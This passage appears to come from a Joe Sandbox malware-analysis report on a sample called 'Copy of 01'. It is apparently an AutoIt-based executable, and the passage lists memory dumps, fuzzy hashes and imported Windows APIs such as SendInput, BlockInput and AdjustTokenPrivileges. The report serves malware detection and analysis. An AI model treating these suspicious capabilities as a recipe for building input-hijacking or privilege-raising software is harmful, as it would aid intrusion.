                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: NameUser
                        • String ID: X64
                        • API String ID: 2645101109-893830106
                        • Opcode ID: 86eba263fb376722b1e9f2a3a6828ea27b0ce143c6e5556056b2fbbb0894293b
                        • Instruction ID: 363d56b22d780909813bd55e568af4b2faaecc502cdb76d6a3c820b3b231020f
                        • Opcode Fuzzy Hash: 86eba263fb376722b1e9f2a3a6828ea27b0ce143c6e5556056b2fbbb0894293b
                        • Instruction Fuzzy Hash: 8ED0C9B481112DEACB91DB90EC88DD9B3BCBB04305F100591F106E2440D730A5488F10
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                        • Instruction ID: f76c324b289243f8693f42b04ab4b297a4ecee824b769ca2411fc15330637f63
                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                        • Instruction Fuzzy Hash: F2022C71E102199FDF15CFA9C880AADFBF1EF48319F259169D819EB390D731AA45CB80
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: Variable is not of type 'Object'.$p#@
                        • API String ID: 0-655357629
                        • Opcode ID: 68bad6a3ab810dbe1d972c829a46ea4ade5276aa0d5ad419dec76c49a2ecf872
                        • Instruction ID: de056fd003c6b108c66c28cd131e343256a9a302ac1dea53186fc0103097868c
                        • Opcode Fuzzy Hash: 68bad6a3ab810dbe1d972c829a46ea4ade5276aa0d5ad419dec76c49a2ecf872
                        • Instruction Fuzzy Hash: 1532AE34910218DBCF1AEF90C9C1AEDB7B9BF05304F1550A9E806BF292D775AE49CB50
                        APIs
                        • FindFirstFileW.KERNEL32(?,?), ref: 003A6918
                        • FindClose.KERNEL32(00000000), ref: 003A6961
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 4c2ddd1b6423d6a46ac7d4afdd1ed68ea5c801242453ba065ef2a9f94e2d715b
                        • Instruction ID: 2e1a02ba322a66087af522935cace89899ae4c91850f513adfc575a51bf61fab
                        • Opcode Fuzzy Hash: 4c2ddd1b6423d6a46ac7d4afdd1ed68ea5c801242453ba065ef2a9f94e2d715b
                        • Instruction Fuzzy Hash: 7311D0356142009FC711CF29C4C9A16BBE4FF89328F09C69DE4698F6A2CB30EC05CB90
                        APIs
                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,003B4891,?,?,00000035,?), ref: 003A37E4
                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,003B4891,?,?,00000035,?), ref: 003A37F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorFormatLastMessage
                        • String ID:
                        • API String ID: 3479602957-0
                        • Opcode ID: 1cc43e238fce0cbd9975b9465255a25540994e0cccb793747070d5bc6c6bf202
                        • Instruction ID: 15bcf667a97e9d6ffcfa69f812351a6d6ddffe552c7bf640785b202ce22031f9
                        • Opcode Fuzzy Hash: 1cc43e238fce0cbd9975b9465255a25540994e0cccb793747070d5bc6c6bf202
                        • Instruction Fuzzy Hash: 4DF0E5B16053286AEB2257669C4DFEB3AAEEFC5761F000265F509D2281D9A09904C7B0
                        APIs
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0039B25D
                        • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 0039B270
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: InputSendkeybd_event
                        • String ID:
                        • API String ID: 3536248340-0
                        • Opcode ID: 7b2976840c5976b8cd3bb0e60f15c41a1f44b51e558dc0bcb9409b9e239ad7da
                        • Instruction ID: d03bd8d88810756b560ab416273272ea8ed65d5895f6c44b29fd36be6072136f
                        • Opcode Fuzzy Hash: 7b2976840c5976b8cd3bb0e60f15c41a1f44b51e558dc0bcb9409b9e239ad7da
                        • Instruction Fuzzy Hash: 73F06D7080424DABDF069FA0C805BAEBBB4FF04305F00840AF955E5192C37992019F94
                        APIs
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003911FC), ref: 003910D4
                        • CloseHandle.KERNEL32(?,?,003911FC), ref: 003910E9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AdjustCloseHandlePrivilegesToken
                        • String ID:
                        • API String ID: 81990902-0
                        • Opcode ID: 69d7e24243530dfe97f8e4ad633f019f4469c10d1b362a43ae89e1c6c6b0d609
                        • Instruction ID: 88e9f763a27dc47ace0d1d6b0b452fb8d537e97a478c1ff1737e332bb70e5eca
                        • Opcode Fuzzy Hash: 69d7e24243530dfe97f8e4ad633f019f4469c10d1b362a43ae89e1c6c6b0d609
                        • Instruction Fuzzy Hash: 7AE0BF72014651AEE7262B51FC05E7777EDFB04311F14882DF5A6844B5DB62BC90DB50
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00366766,?,?,00000008,?,?,0036FEFE,00000000), ref: 00366998
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: 5b6a1589b80ec558d59c3fe25b0cdd221120a2112f4893ef341921830b32eaa3
                        • Instruction ID: d7ed77ba6054bb5d523508c280ce8799470c110edab6bdb84e16fb58a09c3699
                        • Opcode Fuzzy Hash: 5b6a1589b80ec558d59c3fe25b0cdd221120a2112f4893ef341921830b32eaa3
                        • Instruction Fuzzy Hash: DAB13A716106089FD716CF28C48AB657BE0FF453A4F2AC65CE899CF2A6C335E991CB40
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3916222277
                        • Opcode ID: 91a2cac8dc4da12abc6023437480da3687d9d64314569f624b018ad9a39e2a4a
                        • Instruction ID: 21f3bb1cb53c90364f522f1f1585a802f9efaf1e54ae6137473967c12c668fc0
                        • Opcode Fuzzy Hash: 91a2cac8dc4da12abc6023437480da3687d9d64314569f624b018ad9a39e2a4a
                        • Instruction Fuzzy Hash: 67126E759002299FCB26DF59C880AEEB7F5FF48310F55819AE849EB251DB709E81CF90
                        APIs
                        • BlockInput.USER32(00000001), ref: 003AEABD
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: BlockInput
                        • String ID:
                        • API String ID: 3456056419-0
                        • Opcode ID: 94c4fddd41e4fd3c6d9e8af8e0175542941e9220c4715b5238f79e0e7ffe22e8
                        • Instruction ID: d473bd03eb43609c711225ce92a3f5e91156f8c4a38fb40925a843746b9f566c
                        • Opcode Fuzzy Hash: 94c4fddd41e4fd3c6d9e8af8e0175542941e9220c4715b5238f79e0e7ffe22e8
                        • Instruction Fuzzy Hash: 92E01A362202049FD711EF59D844E9AF7EDEF99760F00841AFD49DB351DA70AC408B90
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,003503EE), ref: 003509DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 7e3fb02ebf6dc3b12a4f888f200c6e03437fce0a10f339fec2caa037051c5189
                        • Instruction ID: 6194fd11ecca6938c5ef420c80c741148b50d3afcd87d08ef425616cca335706
                        • Opcode Fuzzy Hash: 7e3fb02ebf6dc3b12a4f888f200c6e03437fce0a10f339fec2caa037051c5189
                        • Instruction Fuzzy Hash:
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                        • Instruction ID: f1968dd1a50a5da8f6c701b57a2c3476d648fbefaa0fa1e4bd4f40afd9bb10d0
                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                        • Instruction Fuzzy Hash: 7F51677160C6455BDB3B8628A85FFFE23999B12343F190509DC82DB6B2C715EE0DD3A2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: 0&@
                        • API String ID: 0-1848180278
                        • Opcode ID: 5bec0f454ff8e4b06f871400d07f5d20693cbe5e45254eb8c834d25586d0f7ff
                        • Instruction ID: 9de7b97fbf7528f52a019c4a515bdacf3607961dc7c54bf4d612678c579202fe
                        • Opcode Fuzzy Hash: 5bec0f454ff8e4b06f871400d07f5d20693cbe5e45254eb8c834d25586d0f7ff
                        • Instruction Fuzzy Hash: 2521D5322206118BD728CE79C92267F73E5EB54310F158A2EE4A7D73D0DE7AA904DB84
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd9af9f2d04dd9838f72a2c4aad2394e77dbc3f51be658f62c830b97f66ecca9
                        • Instruction ID: 87b1cebe20a055e0e646aaf7721ccca6b24fc8e1b4257e4b8001c9091c69b1e1
                        • Opcode Fuzzy Hash: bd9af9f2d04dd9838f72a2c4aad2394e77dbc3f51be658f62c830b97f66ecca9
                        • Instruction Fuzzy Hash: 86323422D2AF414DD7239635DC22336A34DAFB73C9F55D737E82AB59A9EB29C4834100
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e55149ace45c7def1be7fb61e160e67d56db4945c9785c408e81ed85a4a2600d
                        • Instruction ID: 87922e76f4e6d2fd5d3c938dc8fa292d67330d1c10064cc05516cf8c9a47f5a5
                        • Opcode Fuzzy Hash: e55149ace45c7def1be7fb61e160e67d56db4945c9785c408e81ed85a4a2600d
                        • Instruction Fuzzy Hash: 5F322931A203058BCF2BEF28C4D467D77E5EB45300F2AA5A6D959CB691D334ED82DB60
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1c417f1ac3f63f7d37fba13b45f8838a583cc6faf30d1dd7da108ca6e82b8b33
                        • Instruction ID: b6eb8ae1ee6b93fa5049093fe66cede10633e858352e03797b0a45cd189a05d1
                        • Opcode Fuzzy Hash: 1c417f1ac3f63f7d37fba13b45f8838a583cc6faf30d1dd7da108ca6e82b8b33
                        • Instruction Fuzzy Hash: 3022C5B0A04609DFDF2ACF64C881BAEB7F5FF44300F148529E816AB291E779AD55CB50
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d1e667c9648b5ab71cf001b0184c076ca65d46efc39fe8e8ff8ddca2a831c325
                        • Instruction ID: a7d6568ea985bfd08146b545012f90ad704c955f8f8a54da772715e7f8e639ee
                        • Opcode Fuzzy Hash: d1e667c9648b5ab71cf001b0184c076ca65d46efc39fe8e8ff8ddca2a831c325
                        • Instruction Fuzzy Hash: 8202C7B1E0010AEFDB16DF54D881AAEB7B5FF48300F118169E81ADF290E735EA50CB91
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5c7949ccfd2543fe1f458a2429c216c18799797b714e129f0d1d6ee25222db85
                        • Instruction ID: 24792e704e75b2cc33db58e763e26862aea1949da438974faa2a8e0e60c2dd03
                        • Opcode Fuzzy Hash: 5c7949ccfd2543fe1f458a2429c216c18799797b714e129f0d1d6ee25222db85
                        • Instruction Fuzzy Hash: 7461677160878957EA3B9A28B899FBE2398DF41303F150919EC43DF3B1DA119E4E8355
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2ebbc7bcb8d8f7fb0e78d999dfd2b6e9102fdd9727f556312b7c99453cedebec
                        • Instruction ID: eb7329674dd2250a7e7fad5dc95f17bbf47f05f294ee46dd4d81c7f80690f181
                        • Opcode Fuzzy Hash: 2ebbc7bcb8d8f7fb0e78d999dfd2b6e9102fdd9727f556312b7c99453cedebec
                        • Instruction Fuzzy Hash: 8C61997120870957DE3B5A287896FBE23E8AF02703F110949EC43DF6B1EA129D4E8251
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction ID: dde3365dac0a371ea6cd5d7cc0d16c0031b2b0e325ff3a49f613a2039476f2fb
                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction Fuzzy Hash: 2841D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction ID: 6df2accca761ff15154a30e385f8e7aaeea4caf24f590d198d1d48c844b39137
                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction Fuzzy Hash: A2019278A00209EFCB45EF98C5909AEF7B5FB48714F208599D809A7701D730EE41DB80
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction ID: a9ac80da6b893e9babcc68c4fa508fceebaba1df1f07b828c7427349c1df5083
                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction Fuzzy Hash: 2D019278A04209EFCB44EF98C5909AEF7B5FB48714F208599D809A7701D730EE41DB90
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 003B2B30
                        • DeleteObject.GDI32(00000000), ref: 003B2B43
                        • DestroyWindow.USER32 ref: 003B2B52
                        • GetDesktopWindow.USER32 ref: 003B2B6D
                        • GetWindowRect.USER32(00000000), ref: 003B2B74
                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 003B2CA3
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 003B2CB1
                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2CF8
                        • GetClientRect.USER32(00000000,?), ref: 003B2D04
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003B2D40
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D62
                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D75
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D80
